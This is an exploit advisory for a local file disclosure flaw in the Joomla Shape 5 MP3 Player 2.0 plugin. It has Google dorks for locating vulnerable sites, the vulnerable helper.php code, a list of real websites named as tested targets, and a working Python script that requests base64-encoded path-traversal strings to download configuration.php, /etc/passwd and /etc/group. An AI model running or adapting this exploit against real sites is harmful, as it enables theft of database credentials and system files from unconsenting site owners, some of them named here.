Joomla Shape 5 MP3 Player 2.0 Local File Disclosure

` .__ _____ _______   
| |__ / | |___ __\ _ \_______ ____   
| | \ / | |\ \/ / /_\ \_ __ \_/ __ \  
| Y \/ ^ /> <\ \_/ \ | \/\ ___/  
|___| /\____ |/__/\_ \\_____ /__| \___ >  
\/ |__| \/ \/ \/  
_____________________________   
/ _____/\_ _____/\_ ___ \   
\_____ \ | __)_ / \ \/   
/ \ | \\ \____   
/_______ //_______ / \______ /  
\/ \/ \/   
Joomla <= (Shape 5 MP3 Player 2.0) Local File Disclosure Exploit   
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
[+] Author : KnocKout  
[~] Contact : [email protected]  
[~] Skype : [email protected]  
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com   
[~] Greetz : b3mb4m, ZoRLu, KedAns-Dz ( milw00rm.com )  
===================================================================  
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
|~Web App. : Joomla   
|~Plugin : Shape 5 MP3 Player 2.0  
|~Affected Version : 2.0  
|~Software : http://extensions.joomla.org/extension/shape-5-mp3-player  
|~RISK : High  
|~Google Dork : inurl:"php?fileUrl=" site:ru  
|~Google Dork : inurl:plugins/content/s5_media_player  
===================================================================  
======================Info=========================================  
helper.php unconsciously encoded.  
This is a very simple security measures, It was exposed to attack.  
if base64 encrypting the file names  
'fileurl' function is used, and local files will be easily exposed.  
============ Error line's in helper.php ===========================  
<?php  
$path = base64_decode($_REQUEST['fileurl']);  
$base = basename($path);  
$path1 = str_replace(' ','%20',$path);  
  
header('Content-Description: File Transfer');  
header('Content-Type:application/octet-stream');  
header('Content-Transfer-Encoding: Binary');  
header("Content-disposition: attachment; filename=\"".basename($path)."\"");  
header('Content-Length: ' . filesize($path));  
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');  
header('Pragma: public');  
readfile($path1);  
exit;  
?>  
======================================================================  
======================== Tested on Demos ============================  
www.kraskinotv.ru  
www.alexandra-pavlyuk.ru  
www.kovspas.ru  
www.asetkz.ru  
www.cciheredia.cr  
www.helicopterspray.com  
www.kpu-karawang.go.id  
www.practicalbioethics.org  
www.iccfoundation.us  
www.mixticius.net  
www.stbarnabasdulwich.org  
www.ahavathachim.com  
www.dcbaptist.org  
www.stjohnmansfield.org  
www.ilyda.com  
www.mountainviewchapel.com  
www.biamd.org  
www.lavingtonunited.org  
www.cypressbible.org  
www.brianmcgilloway.com  
www.toneside.com  
..  
etc  
..  
=======================================================================  
================ usage: python h4.py www.site.com ====================  
  
import base64  
import sys  
import urllib  
  
  
def exploit():  
while True:  
print """  
[1] = configuration.php  
[2] = Try Read /etc/passwd  
[3] = Try Read /etc/group  
"""  
command = raw_input("h4 Console# ")  
if command == "1":  
command = base64.b64encode("../../../configuration.php")  
elif command == "2":  
command = base64.b64encode("../../../../../../../../../etc/passwd")  
elif command == "3":  
command = base64.b64encode("../../../../../../../../../etc/group")  
else:  
command = base64.b64encode(command)  
  
url = "http://%s/plugins/content/s5_media_player/helper.php?fileurl=%s" % (sys.argv[1],command)  
  
try:  
test = urllib.urlopen(url)  
if len(test.read()) <= 0:  
print "Exploit failed .."  
else:  
urllib.urlretrieve(url, command)  
#wget.download(url)  
print "Exploit success ! "  
except Exception as e:  
print "Unexpected error : %s " % e  
  
  
  
  
if __name__ == '__main__':  
if len(sys.argv) > 2:  
print "Error usage : python exploit.py website.com"  
else:  
exploit()  
`